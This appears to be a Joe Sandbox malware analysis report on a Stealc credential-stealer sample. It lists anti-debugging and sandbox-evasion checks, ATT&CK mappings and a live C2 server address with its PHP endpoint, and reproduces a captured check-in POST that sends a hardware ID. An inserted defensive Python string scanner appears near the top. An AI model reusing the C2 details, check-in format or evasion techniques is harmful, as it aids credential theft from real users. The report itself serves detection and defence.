Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A745C0 | VirtualProtect ?,00000004,00000100,00000000
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A89860 | GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A89750 | mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A878E0 | GetProcessHeap,RtlAllocateHeap,GetComputerNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard
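The anti-debugging rows above, together with the registry queries and the VBOX/VMware/Hyper-V and Oreans.vxd / Software\WinLicense strings in the evasion section, list the literal strings the protector (Oreans' WinLicense, per those strings) looks for: monitor and debugger window classes, SoftICE device names, and virtualization markers. The Python below is an added example, not part of the report or the sample, that turns those exact strings into a triage scanner: it checks a file's bytes for each indicator in both ASCII and UTF-16LE, case-insensitively, and reports the categories hit. The category names are the editor's, the device-path form for the SoftICE names is an assumption about how the open is issued (the report shows only the bare names), and the input blob is constructed rather than taken from file.exe.

```python
"""Triage scanner for the anti-analysis strings this report lists (added example)."""
from typing import Dict, List

# Indicator strings taken from the report above, grouped by what the
# protector is looking for. The device-path form (\\.\NAME) for the SoftICE
# names is an assumption about how the open is issued; the report only shows
# the bare names.
INDICATORS: Dict[str, List[str]] = {
    "monitor/debugger windows": [
        "regmonclass", "gbdyllo", "procmon_window_class", "filemonclass", "ollydbg",
        "process monitor - sysinternals: www.sysinternals.com",
        "registry monitor - sysinternals: www.sysinternals.com",
        "file monitor - sysinternals: www.sysinternals.com",
    ],
    "softice devices": ["\\\\.\\NTICE", "\\\\.\\SICE", "\\\\.\\SIWVID"],
    "vm registry markers": [
        "SystemBiosVersion", "VideoBiosVersion",
        "{4d36e968-e325-11ce-bfc1-08002be10318}",  # display adapter class key (DriverDesc)
        "HARDWARE\\ACPI\\DSDT\\VBOX__",
    ],
    "hypervisor strings": ["VMwareVMware", "Hyper-V RAW"],
    "oreans protector": ["Oreans.vxd", "Software\\WinLicense"],
}


def _forms(needle: str) -> List[bytes]:
    """ASCII and UTF-16LE spellings, lower-cased: Windows binaries carry
    either encoding, and the lookups these strings feed are case-insensitive."""
    low = needle.lower()
    return [low.encode("ascii"), low.encode("utf-16-le")]


def scan(data: bytes) -> Dict[str, List[str]]:
    """Return {category: [indicators present]} for a file's raw bytes.

    bytes.lower() only folds ASCII letters, which is exactly what is wanted:
    the NUL bytes of a UTF-16LE string are left alone and still line up.
    """
    haystack = data.lower()
    hits: Dict[str, List[str]] = {}
    for category, needles in INDICATORS.items():
        found = [n for n in needles if any(f in haystack for f in _forms(n))]
        if found:
            hits[category] = found
    return hits


def scan_file(path: str) -> Dict[str, List[str]]:
    """Convenience wrapper: scan a file on disk (ideally the unpacked image)."""
    with open(path, "rb") as fh:
        return scan(fh.read())


# Constructed blob standing in for a packed binary; not bytes from file.exe.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"\\\\.\\SICE\x00"                             # SoftICE device open, ASCII
    + "OLLYDBG".encode("utf-16-le") + b"\x00\x00"    # window class, wide, upper-case
    + b"HARDWARE\\ACPI\\DSDT\\VBOX__\x00"
    + b"Software\\WinLicense\x00"
    + b"nothing to see here\x00"
)

if __name__ == "__main__":
    for category, found in scan(SAMPLE_BLOB).items():
        print(f"{category}: {', '.join(found)}")
```

Because the strings in this report were recovered from memory, run the scanner on a process dump or the unpacked image (the report's `0.2.file.exe.a70000.0.unpack`) rather than the packed file, which will usually show none of them.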

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A89600 | CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: BProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A87B90 | GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A87980 | GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A87850 | GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A87A30 | GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (the report's 14-column matrix, rebuilt one line per tactic; the number in parentheses is the signature count Joe Sandbox shows for that technique, and techniques without one are unmatched cells of the matrix):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise
Execution: Command and Scripting Interpreter (2), Native API (11), At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Privilege Escalation: Process Injection (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement
Antivirus detection: Source | Detection | Scanner | Label
file.exe | 47% | ReversingLabs | Win32.Trojan.Generic
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No contacted domains info
Contacted URLs (the antivirus detection column is empty for every row): Name | Malicious | Reputation
http://185.215.113.37/ | true | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | unknown

URLs from memory and binary strings (the antivirus detection column is empty for every row): Name | Source | Malicious | Reputation
http://185.215.113.37/t | file.exe, 00000000.00000002.1297365011.00000000006C8000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | true | unknown
http://185.215.113.37/e2b1563c6670f193.php&f&f | file.exe, 00000000.00000002.1297365011.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.37w | file.exe, 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.37/e2b1563c6670f193.phpfeV | file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://185.215.113.37/e2b1563c6670f193.phpVe | file.exe, 00000000.00000002.1297365011.00000000006B3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1521649
                                Start date and time:2024-09-29 01:35:08 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 56s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:15
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 18
                                • Number of non-executed functions: 87
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe
                                No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Amadey, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
                                No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey, Stealc | Browse | 185.215.113.103
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
| file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.947459611439105
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:1'843'712 bytes
                                MD5:4d54b2279d2b7ca76fdaf6d89c509355
                                SHA1:379684bc91685997bfe8fba6a15212f925c7cafe
                                SHA256:65055a6af994e27432e1bb9ced6fcb0886680b9f5a1a715d32d98341203cb7cc
                                SHA512:8b15040ddc2c1e1070fa1e1f74d9c62610ff4f0e8c0fa2ffa995dc6696dfb6d851a7e60dece0eb2e753d62ab366b6cec18ca9f56333e4508d6b90c7f61066bd2
                                SSDEEP:49152:wVJht3RXBy6BIag4TbsjVgH9r8DEqqZfLK+F5SfJrjzfl:wVJhtFB7SkQmHl8a5LKMSFfl
                                TLSH:F68533FD3816FCA0CEC42C3169474E1BB999224743D7DB2DEEAEC50699DB38067D9842
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xa9b000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x25b000 | 0x22800 | 6dbc7089aebc1ca85afc2cb30e070ca0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x25e000 | 0x2a0000 | 0x200 | 1e38b4a34cb01603b77c39c09dc0a4df | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
spyqlfjc | 0x4fe000 | 0x19c000 | 0x19be00 | 25b58f188a804099cd315ae113b7bdfb | False | 0.9948946083080424 | data | 7.9536919163300555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
scxfhudm | 0x69a000 | 0x1000 | 0x600 | 60b0fd34005dd0d9308cd327d29b158e | False | 0.587890625 | data | 5.051555941674177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x69b000 | 0x3000 | 0x2200 | 18bbe7bd9d2032f19a4448beb393b948 | False | 0.062270220588235295 | Applesoft BASIC program data, first line number 15 | 0.8136820767074039 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-29T01:36:06.027240+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 29, 2024 01:36:05.059812069 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Sep 29, 2024 01:36:05.064753056 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Sep 29, 2024 01:36:05.064846992 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Sep 29, 2024 01:36:05.065614939 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Sep 29, 2024 01:36:05.070385933 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Sep 29, 2024 01:36:05.782670975 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Sep 29, 2024 01:36:05.782742023 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Sep 29, 2024 01:36:05.787992954 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Sep 29, 2024 01:36:05.792798042 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Sep 29, 2024 01:36:06.027143955 CEST | 80 | 49699 | 185.215.113.37 | 192.168.2.7
Sep 29, 2024 01:36:06.027240038 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Sep 29, 2024 01:36:08.926250935 CEST | 49699 | 80 | 192.168.2.7 | 185.215.113.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 29, 2024 01:36:48.156236887 CEST | 53 | 58184 | 162.159.36.2 | 192.168.2.7
Sep 29, 2024 01:36:48.885674000 CEST | 53 | 59801 | 1.1.1.1 | 192.168.2.7
                                • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49699 | 185.215.113.37 | 80 | 6672 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Sep 29, 2024 01:36:05.065614939 CEST | 89 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.37
                                Connection: Keep-Alive
                                Cache-Control: no-cache
Sep 29, 2024 01:36:05.782670975 CEST | 203 | IN | HTTP/1.1 200 OK
                                Date: Sat, 28 Sep 2024 23:36:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
Sep 29, 2024 01:36:05.787992954 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----JJJJDAAECGHDGDGCGHDB
                                Host: 185.215.113.37
                                Content-Length: 211
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 30 35 39 30 36 42 45 30 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 44 41 41 45 43 47 48 44 47 44 47 43 47 48 44 42 2d 2d 0d 0a
                                Data Ascii: ------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="hwid"8E05906BE0482604982160------JJJJDAAECGHDGDGCGHDBContent-Disposition: form-data; name="build"save------JJJJDAAECGHDGDGCGHDB--
Sep 29, 2024 01:36:06.027143955 CEST | 210 | IN | HTTP/1.1 200 OK
                                Date: Sat, 28 Sep 2024 23:36:05 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=

                                Target ID:0
                                Start time:19:36:01
                                Start date:28/09/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xa70000
                                File size:1'843'712 bytes
                                MD5 hash:4D54B2279D2B7CA76FDAF6D89C509355
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1255957657.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1297365011.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                  Execution Graph

                                  Execution Coverage:7.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:3.2%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:25
13881->13882 13883 a8a8a0 lstrcpy 13882->13883 13884 a86455 13883->13884 13885 a8a8a0 lstrcpy 13884->13885 13886 a86467 13885->13886 13887 a8a8a0 lstrcpy 13886->13887 13888 a85b86 13887->13888 13888->13652 13890 a745c0 2 API calls 13889->13890 13891 a726b4 13890->13891 13892 a745c0 2 API calls 13891->13892 13893 a726d7 13892->13893 13894 a745c0 2 API calls 13893->13894 13895 a726f0 13894->13895 13896 a745c0 2 API calls 13895->13896 13897 a72709 13896->13897 13898 a745c0 2 API calls 13897->13898 13899 a72736 13898->13899 13900 a745c0 2 API calls 13899->13900 13901 a7274f 13900->13901 13902 a745c0 2 API calls 13901->13902 13903 a72768 13902->13903 13904 a745c0 2 API calls 13903->13904 13905 a72795 13904->13905 13906 a745c0 2 API calls 13905->13906 13907 a727ae 13906->13907 13908 a745c0 2 API calls 13907->13908 13909 a727c7 13908->13909 13910 a745c0 2 API calls 13909->13910 13911 a727e0 13910->13911 13912 a745c0 2 API calls 13911->13912 13913 a727f9 13912->13913 13914 a745c0 2 API calls 13913->13914 13915 a72812 13914->13915 13916 a745c0 2 API calls 13915->13916 13917 a7282b 13916->13917 13918 a745c0 2 API calls 13917->13918 13919 a72844 13918->13919 13920 a745c0 2 API calls 13919->13920 13921 a7285d 13920->13921 13922 a745c0 2 API calls 13921->13922 13923 a72876 13922->13923 13924 a745c0 2 API calls 13923->13924 13925 a7288f 13924->13925 13926 a745c0 2 API calls 13925->13926 13927 a728a8 13926->13927 13928 a745c0 2 API calls 13927->13928 13929 a728c1 13928->13929 13930 a745c0 2 API calls 13929->13930 13931 a728da 13930->13931 13932 a745c0 2 API calls 13931->13932 13933 a728f3 13932->13933 13934 a745c0 2 API calls 13933->13934 13935 a7290c 13934->13935 13936 a745c0 2 API calls 13935->13936 13937 a72925 13936->13937 13938 a745c0 2 API calls 13937->13938 13939 a7293e 13938->13939 13940 a745c0 2 API calls 13939->13940 13941 a72957 13940->13941 13942 a745c0 2 API calls 13941->13942 13943 a72970 13942->13943 13944 a745c0 2 API calls 13943->13944 13945 a72989 13944->13945 
13946 a745c0 2 API calls 13945->13946 13947 a729a2 13946->13947 13948 a745c0 2 API calls 13947->13948 13949 a729bb 13948->13949 13950 a745c0 2 API calls 13949->13950 13951 a729d4 13950->13951 13952 a745c0 2 API calls 13951->13952 13953 a729ed 13952->13953 13954 a745c0 2 API calls 13953->13954 13955 a72a06 13954->13955 13956 a745c0 2 API calls 13955->13956 13957 a72a1f 13956->13957 13958 a745c0 2 API calls 13957->13958 13959 a72a38 13958->13959 13960 a745c0 2 API calls 13959->13960 13961 a72a51 13960->13961 13962 a745c0 2 API calls 13961->13962 13963 a72a6a 13962->13963 13964 a745c0 2 API calls 13963->13964 13965 a72a83 13964->13965 13966 a745c0 2 API calls 13965->13966 13967 a72a9c 13966->13967 13968 a745c0 2 API calls 13967->13968 13969 a72ab5 13968->13969 13970 a745c0 2 API calls 13969->13970 13971 a72ace 13970->13971 13972 a745c0 2 API calls 13971->13972 13973 a72ae7 13972->13973 13974 a745c0 2 API calls 13973->13974 13975 a72b00 13974->13975 13976 a745c0 2 API calls 13975->13976 13977 a72b19 13976->13977 13978 a745c0 2 API calls 13977->13978 13979 a72b32 13978->13979 13980 a745c0 2 API calls 13979->13980 13981 a72b4b 13980->13981 13982 a745c0 2 API calls 13981->13982 13983 a72b64 13982->13983 13984 a745c0 2 API calls 13983->13984 13985 a72b7d 13984->13985 13986 a745c0 2 API calls 13985->13986 13987 a72b96 13986->13987 13988 a745c0 2 API calls 13987->13988 13989 a72baf 13988->13989 13990 a745c0 2 API calls 13989->13990 13991 a72bc8 13990->13991 13992 a745c0 2 API calls 13991->13992 13993 a72be1 13992->13993 13994 a745c0 2 API 